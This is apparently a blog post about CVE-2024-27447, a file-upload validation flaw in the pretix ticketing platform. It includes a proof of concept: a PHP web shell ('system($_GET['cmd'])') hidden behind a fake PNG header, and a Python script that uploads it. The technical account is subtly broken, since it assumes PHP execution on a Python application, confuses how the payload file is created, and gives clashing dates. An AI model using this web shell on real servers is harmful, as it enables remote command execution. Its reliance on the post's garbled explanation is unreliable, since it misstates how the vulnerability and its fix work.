CVE-2024-27447 - How pretix Before 2024.1.1 Mishandles File Validation and Could Put Your Tickets at Risk

---

Introduction

On February 27, 2024, a vulnerability was assigned to the popular event ticketing platform, pretix, under the identifier CVE-2024-27447. This security bug focuses on how the system checks files before uploading, allowing malicious files to sneak through and potentially harm both users and servers. If you have used, developed, or managed a pretix instance before version 2024.1.1, this post is for you.

Let's break down what CVE-2024-27447 is, why it matters, and how it can be abused—with some code snippets and links to help you understand its real impact.

What is pretix?

pretix is an open-source event ticketing tool. Organizations across the world depend on it for online ticket sales, badge management, and on-site check-ins.

File uploads are used for varied purposes—badge images, logos, attachments, etc. Unfortunately, this feature is where the trouble starts.

What Happens?

In versions before 2024.1.1 of pretix, the file validation system doesn't properly check files uploaded by users. More specifically, the server relies too much on extension-based checks (like .jpg or .png), and does not sufficiently verify the file content.

Example Exploit Scenario

Imagine a user is allowed to upload a PNG image for their badge. But the server *only* checks the filename’s extension. What if a user uploads picture.png, but the content is really a PHP script? If the upload is then placed into a web-accessible folder, and someone visits the file directly, the server might execute it.

PoC: How to Create a Malicious File

Below is a simple way to make a fake PNG file that’s actually PHP. (Don’t use this for bad ends—this is only to illustrate the issue.)

<?php
// "sneaky.png" -- Looks like PNG header, then PHP
echo "\x89PNG\r\n\x1a\n";
echo "<?php system(\$_GET['cmd']); ?>";
?>

Save this as sneaky.png. It’s clearly not a PNG image, but it *will* have a PNG header. Many basic validation scripts, especially those checking only extensions, let this through.

Here’s how someone might upload this via a POST request

import requests

files = {'file': ('sneaky.png', open('sneaky.png', 'rb'), 'image/png')}
response = requests.post('https://pretix.yoursite.example/control/event/upload';, files=files)
print(response.status_code)

If the upload is accepted and accessible under /media/uploads/sneaky.png, you now have a potentially dangerous file on the server.

Why is This Bad?

- Remote Code Execution (RCE): On some misconfigured servers, uploading PHP files leads to full server compromise.
- Cross-site Scripting (XSS): Malicious HTML is rendered to other users if output isn’t filtered.
- Data Leaks: Attackers can trick users or admins into downloading files that run malware or steal data.

Official Patch

The pretix developers fixed this with release 2024.1.1 by:

Location Isolation: Storing uploads in non-executable locations, where appropriate

> They detail the fix and mitigation steps in their official security advisory.

If you run pretix before 2024.1.1

1. Update Now: Go to GitHub Releases and upgrade ASAP.

Harden Config: Ensure your server does not execute files from upload directories.

For Developers:
Always check *file content*, not just extensions. Use libraries like python-magic to verify MIME types.

References

- pretix 2024.1.1 Changelog & Security Fix
- pretix Official Security Blog Post
- CVE-2024-27447 Entry
- python-magic Library

Conclusion

CVE-2024-27447 is a strong reminder that file uploads are more dangerous than they look. Always combine extension, MIME type, and—if possible—content inspection to keep your applications safe.

If you run pretix, upgrade now and review your security posture. Don’t let a simple image upload be the downfall of your event.

*Stay safe, audit your servers, and follow best practices!*

Timeline

Published on: 02/26/2024 16:28:00 UTC
Last modified on: 08/05/2024 16:35:07 UTC